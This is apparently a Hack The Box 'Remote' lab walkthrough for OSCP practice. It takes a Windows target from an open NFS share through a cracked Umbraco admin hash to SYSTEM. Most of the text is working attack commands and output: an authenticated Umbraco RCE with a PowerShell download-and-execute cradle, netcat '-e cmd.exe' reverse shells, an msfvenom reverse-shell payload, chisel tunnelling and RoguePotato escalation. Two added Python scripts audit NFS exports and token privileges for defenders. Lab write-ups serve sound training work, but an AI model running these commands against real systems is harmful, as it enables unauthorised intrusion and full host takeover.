In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Enumeration
Nmap scan
# Nmap 7.94 scan initiated Thu Oct 26 00:06:21 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/remote/results/10.10.10.180/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/remote/results/10.10.10.180/scans/xml/_quick_tcp_nmap.xml 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up, received user-set (0.31s latency).
Scanned at 2023-10-26 00:06:22 EDT for 386s
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
2049/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-26T04:09:44
|_ start_date: N/A
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 45222/tcp): CLEAN (Couldn't connect)
| Check 2 (port 38622/tcp): CLEAN (Couldn't connect)
| Check 3 (port 15893/udp): CLEAN (Failed to receive data)
| Check 4 (port 51124/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 26 00:12:48 2023 -- 1 IP address (1 host up) scanned in 387.28 seconds
Port 111
Export list for 10.10.10.180:
/site_backups (everyone)
Nikto scan
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.180
+ Target Hostname: 10.10.10.180
+ Target Port: 80
+ Start Time: 2023-10-26 00:12:54 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /home/: This might be interesting.
+ /intranet/: This might be interesting.
+ /umbraco/ping.aspx: Umbraco ping page found.
+ 7673 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-10-26 00:55:44 (GMT-4) (2570 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
From the targeted scan of port 111 (rpcbind/NFS) and the export list:
PORT STATE SERVICE REASON VERSION
111/tcp open rpcbind? syn-ack
| rpcinfo:
| program version port/proto service
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100021 3,4 2049/tcp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 26 00:17:07 2023 -- 1 IP address (1 host up) scanned in 258.42 seconds
Export list for 10.10.10.180:
/site_backups (everyone)
We mount the export:
╭─kali@kali ~/HTB/remote
╰─$ sudo mount -v -t nfs 10.10.10.180:/site_backups /mnt/
mount.nfs: timeout set for Thu Oct 26 22:22:09 2023
mount.nfs: trying text-based options 'vers=4.2,addr=10.10.10.180,clientaddr=10.10.14.4'
mount.nfs: mount(2): Protocol not supported
mount.nfs: trying text-based options 'vers=4,minorversion=1,addr=10.10.10.180,clientaddr=10.10.14.4'
╭─kali@kali ~/HTB/remote
╰─$ cd mnt
╭─kali@kali ~/HTB/remote/mnt
╰─$ ls
App_Browsers App_Plugins bin css Global.asax scripts Umbraco_Client Web.config
App_Data aspnet_client Config default.aspx Media Umbraco Views
╭─kali@kali ~/HTB/remote/mnt
╰─$
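The lesson from the export above is that an NFS share open to everyone handed out a site backup containing Web.config and the Umbraco database. As an added defender-side check (example code, not part of the original writeup), the script below parses a showmount-style export list and flags exports readable by any host, then walks a mounted export for files that usually hold credentials. The export text and the directory tree are constructed samples that mirror what this box exposed.

```python
import tempfile
from pathlib import Path

# Constructed sample of `showmount -e` output, mirroring the export seen on the box.
EXPORT_LIST = """Export list for 10.10.10.180:
/site_backups (everyone)
"""

# Names and suffixes that usually carry secrets in an ASP.NET / Umbraco site backup
# (Web.config holds connection strings; umbraco.sdf is the CMS database with user hashes).
SENSITIVE_NAMES = {"web.config", "umbraco.sdf", "connectionstrings.config"}
SENSITIVE_SUFFIXES = {".sdf", ".mdf", ".bak"}


def parse_exports(text):
    """Return (path, client_spec) pairs from showmount -e style output."""
    exports = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list for"):
            continue
        path, _, clients = line.partition(" ")
        exports.append((path, clients.strip()))
    return exports


def world_readable_exports(text):
    """Paths whose client list allows any host ('everyone' on Windows NFS, '*' on Linux)."""
    flagged = []
    for path, clients in parse_exports(text):
        client_set = {c.strip("()").lower() for c in clients.split(",")}
        if client_set & {"everyone", "*"}:
            flagged.append(path)
    return flagged


def find_sensitive_files(mount_root):
    """Walk a mounted export and return relative paths of files likely to hold credentials."""
    root = Path(mount_root)
    hits = []
    for p in root.rglob("*"):
        if p.is_file() and (p.name.lower() in SENSITIVE_NAMES
                            or p.suffix.lower() in SENSITIVE_SUFFIXES):
            hits.append(p.relative_to(root).as_posix())
    return sorted(hits)


def build_sample_backup(base):
    """Constructed stand-in for the mounted /site_backups tree (layout only, dummy contents)."""
    for rel in ["Web.config", "App_Data/umbraco.sdf", "default.aspx",
                "css/site.css", "Config/umbracoSettings.config"]:
        f = Path(base) / rel
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_text("sample")


def audit(export_text, mount_root):
    """Combine both checks into one findings dict."""
    return {
        "world_readable_exports": world_readable_exports(export_text),
        "sensitive_files": find_sensitive_files(mount_root),
    }


def demo():
    """Run the audit against the constructed samples and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_backup(tmp)
        return audit(EXPORT_LIST, tmp)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Pointing `audit()` at a real `showmount -e` capture and a real mount point turns this into a quick exposure check for any NFS server you administer.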
A search of the umbraco.sdf file in App_Data for password-related strings:
╭─kali@kali ~/HTB/remote/mnt/App_Data
╰─$ strings umbraco.sdf |grep -i password
userPassword
Password
Password
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.137User "ssmith" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "SYSTEM" 192.168.195.1User "ssmith" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "ssmith" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
passwordConfig
lastPasswordChangeDate
umbracoMemberFailedPasswordAttemptsFailed Password Attempts
umbracoMemberLastPasswordChangeDateLast Password Change Date
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
umbracoMemberPasswordRetrievalAnswerPassword Answer
umbracoMemberPasswordRetrievalQuestionPassword Question
╭─kali@kali ~/HTB/remote/mnt/App_Data
╰─$ strings umbraco.sdf |grep -i [email protected] | grep -i password
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "smith" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "ssmith" <[email protected]>umbraco/user/password/changepassword change
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/password/changepassword change
User "SYSTEM" 192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "admin" <[email protected]>192.168.195.1User "admin" <[email protected]>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
A more refined search shows the hashes:
╭─kali@kali ~/HTB/remote/mnt/App_Data
╰─$ strings umbraco.sdf |grep -i [email protected] | grep -i hash
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
╭─kali@kali ~/HTB/remote/mnt/App_Data
Copy the hash b8be16afba8c314ad33d812f22a04991b90e2aaa to a hash.txt file:
╭─kali@kali ~/HTB/remote
╰─$ cat hash.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa
╭─kali@kali ~/HTB/remote
╰─$
Cracking with hashcat (mode 100, raw SHA1):
╭─kali@kali /usr/bin
╰─$ ./hashcat -m 100 ~/HTB/remote/hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-1160G7 @ 1.20GHz, 2815/5694 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 100 (SHA1)
Hash.Target......: b8be16afba8c314ad33d812f22a04991b90e2aaa
Time.Started.....: Thu Oct 26 22:38:14 2023 (8 secs)
Time.Estimated...: Thu Oct 26 22:38:22 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1325.3 kH/s (0.35ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 9824256/14344385 (68.49%)
Rejected.........: 0/9824256 (0.00%)
Restore.Point....: 9822208/14344385 (68.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: badboi56 -> bacninh_kc
Hardware.Mon.#1..: Util: 43%
Started: Thu Oct 26 22:38:11 2023
Stopped: Thu Oct 26 22:38:24 2023
╭─kali@kali /usr/bin
We have the username admin and the password baconandcheese.
We log in via the website.
Via Help, we find that the site is running Umbraco version 7.12.4.
Checking searchsploit:
╭─kali@kali ~/HTB/remote
╰─$ searchsploit umbraco
-------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF | aspx/webapps/50462.txt
-------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
╭─kali@kali ~/HTB/remote
╰─$
Got a script for Umbraco here: https://github.com/noraj/Umbraco-RCE
Downloaded and ran the script, but first modified Invoke-PowerShellTcp.ps1 and added the following line at the end:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.4 -Port 443
Run the exploit and listen on 443 while serving Invoke-PowerShellTcp.ps1.
Serving files on port 9000:
╰─$ serve 9000
Starting HTTP server on port 9000...
====================================
certutil -urlcache -f http://10.10.14.4:9000/file_to_download.txt C:\path\where\you\lile.txt
Invoke-WebRequest -Uri http://10.10.14.4:9000/file_to_download.txt -OutFile C:\path\lile.txt
Exploit:
╭─kali@kali ~/HTB/remote
╰─$ python exploit.py -u [email protected] -p baconandcheese -i 'http://10.10.10.180/' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4:9000/Invoke-PowerShellTcp.ps1')"
Listener:
╭─kali@kali ~/HTB/remote
╰─$ nc -nlvp 443 1 ↵
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.180] 49689
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>
I want to get back to cmd, so I will run a reverse shell to 4444 with ncat, which I copy to the machine.
PS C:\> cd temp
PS C:\temp> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.4:9000/nc.exe', 'c:\temp\nc.exe')"
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/27/2023 8:48 PM 59392 nc.exe
PS C:\temp> c:\temp\nc.exe 10.10.14.4 4444 -e cmd.exe
Listener:
╰─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.180] 49691
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\temp>
whoami
C:\temp>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
ERROR: Unable to get user claims information.
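The token above belongs to an IIS application pool identity that holds SeImpersonatePrivilege, which is exactly what the Potato family of local privilege escalations needs. As an added defender-side check (example code, not from the original writeup), the script below parses `whoami /all` output, identifies service identities by their S-1-5-82 SID prefix, and reports the high-risk privileges they hold. The sample text is a constructed copy of this box's output with regular spacing; the HIGH_RISK set is my own list of privileges known to enable escalation.

```python
# Constructed sample mirroring the `whoami /all` output captured on the box
# (whitespace regularised; only the sections this check needs).
WHOAMI_ALL = """
USER INFORMATION
----------------

User Name                  SID
========================== =============================================================
iis apppool\\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that let a compromised process reach SYSTEM: the Potato family needs
# SeImpersonate or SeAssignPrimaryToken, the rest are classic escalation paths.
HIGH_RISK = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeTcbPrivilege", "SeCreateTokenPrivilege", "SeLoadDriverPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
}


def parse_user(text):
    """Return (user_name, sid) from the USER INFORMATION section."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if line.startswith("=") and i > 0 and lines[i - 1].startswith("User Name"):
            name, sid = lines[i + 1].rsplit(" ", 1)
            return name.strip(), sid.strip()
    return None, None


def parse_privileges(text):
    """Return {privilege_name: state} from the PRIVILEGES INFORMATION table."""
    privs = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("Privilege Name"):
            in_table = True
            continue
        if not in_table or line.startswith("="):
            continue
        if not line.strip():
            if privs:
                break  # blank line after the rows ends the table
            continue
        parts = line.split()
        privs[parts[0]] = parts[-1]  # first column is the name, last is the state
    return privs


def is_service_identity(user, sid):
    """IIS app pool identities carry the S-1-5-82 SID prefix; also match the name form."""
    return sid.startswith("S-1-5-82-") or user.lower().startswith("iis apppool\\")


def audit(text):
    """Flag high-risk privileges the token holds. The state is reported but not relied
    on: a process can re-enable a 'Disabled' privilege that its token still holds."""
    user, sid = parse_user(text)
    privs = parse_privileges(text)
    risky = [(p, privs[p]) for p in sorted(privs) if p in HIGH_RISK]
    return {"user": user, "service_identity": is_service_identity(user, sid), "risky": risky}


if __name__ == "__main__":
    print(audit(WHOAMI_ALL))
```

App pool identities hold SeImpersonatePrivilege by default, so the finding is a reason to treat any RCE in the web application as a SYSTEM compromise and to harden the application, patch level and outbound RPC filtering, rather than a setting to flip off.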
We have SeImpersonatePrivilege, so we are going to try RoguePotato.
Copy to the machine:
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 155k 100 155k 0 0 79616 0 0:00:02 0:00:02 --:--:-- 77787
C:\temp>
RoguePotato usage example found online:
.\RoguePotato.exe -r 10.10.x.x -l 9999 -e c:\\Windows\\Temp\\rev.bat
Creating a reverse shell payload to port 444 with msfvenom:
╰─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.4 -a x64 --platform windows LPORT=444 -f exe > potato.exe
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
╭─kali@kali ~/HTB/remote
╰─$
Copy to the machine:
C:\temp>curl http://10.10.14.4:9000/Potato.exe -o Potato.exe
curl http://10.10.14.4:9000/Potato.exe -o Potato.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 335 100 335 0 0 335 0 0:00:01 --:--:-- 0:00:01 476
Copy chisel to Windows:
C:\temp>curl http://10.10.14.4:9000/chisel_1.9.1_windows_amd64 -o chisel_1.9.1_windows_amd64
curl http://10.10.14.4:9000/chisel_1.9.1_windows_amd64 -o chisel_1.9.1_windows_amd64
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 8795k 100 8795k 0 0 676k 0 0:00:13 0:00:13 --:--:-- 1454k
C:\temp>
Start the chisel server on Linux:
╭─kali@kali ~/HTB/remote
╰─$ sudo ./chisel_1.9.1_linux_amd64 server -p 8000 --reverse 130 ↵
[sudo] password for kali:
2023/10/28 06:51:52 server: Reverse tunnelling enabled
2023/10/28 06:51:52 server: Fingerprint kh/0fS9NoP6LVW1Yp8dVD9m9Kl0jDFSDRIw8SxzB1b0=
2023/10/28 06:51:52 server: Listening on http://0.0.0.0:8000
Run the chisel client on Windows, so that port 135 on the Kali side is forwarded back through the tunnel to port 9999 on the target:
chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:135:localhost:9999
2023/10/28 07:04:24 client: Connecting to ws://10.10.14.4:8000
2023/10/28 07:04:27 client: Connected (Latency 348.9001ms)
Run RoguePotato and listen on port 444.
RoguePotato test with ping:
.\RoguePotato.exe -r 10.10.14.4 -e "cmd.exe /c ping 10.10.14.4" -l 9999
and tcpdump:
╰─$ sudo tcpdump -i tun0 icmp 1 ↵
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
07:16:31.610411 IP 10.10.10.180 > 10.10.14.4: ICMP echo request, id 1, seq 5, length 40
07:16:31.617186 IP 10.10.14.4 > 10.10.10.180: ICMP echo reply, id 1, seq 5, length 40
07:16:32.809065 IP 10.10.10.180 > 10.10.14.4: ICMP echo request, id 1, seq 6, length 40
07:16:32.809152 IP 10.10.14.4 > 10.10.10.180: ICMP echo reply, id 1, seq 6, length 40
07:16:33.720648 IP 10.10.10.180 > 10.10.14.4: ICMP echo request, id 1, seq 7, length 40
07:16:33.720691 IP 10.10.14.4 > 10.10.10.180: ICMP echo reply, id 1, seq 7, length 40
C:\temp>.\RoguePotato.exe -r 10.10.14.4 -e "cmd.exe /c nc.exe 10.10.14.4 444 -e cmd.exe" -l 9999
.\RoguePotato.exe -r 10.10.14.4 -e "cmd.exe /c nc.exe 10.10.14.4 444 -e cmd.exe" -l 9999
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written:102 bytes
[*] SecurityCallback RPC call
[*] ServerAlive2 RPC Call
[*] SecurityCallback RPC call
[*] ResolveOxid2 RPC call, this is for us!
[*] ResolveOxid2: returned endpoint binding information = ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
[*] Client connected!
[+] Got SYSTEM Token!!!
[*] Token has SE_ASSIGN_PRIMARY_NAME, using CreateProcessAsUser() for launching: cmd.exe /c nc.exe 10.10.14.4 444 -e cmd.exe
[+] RoguePotato gave you the SYSTEM powerz :D
C:\temp>whoami
whoami
nt authority\system
C:\temp>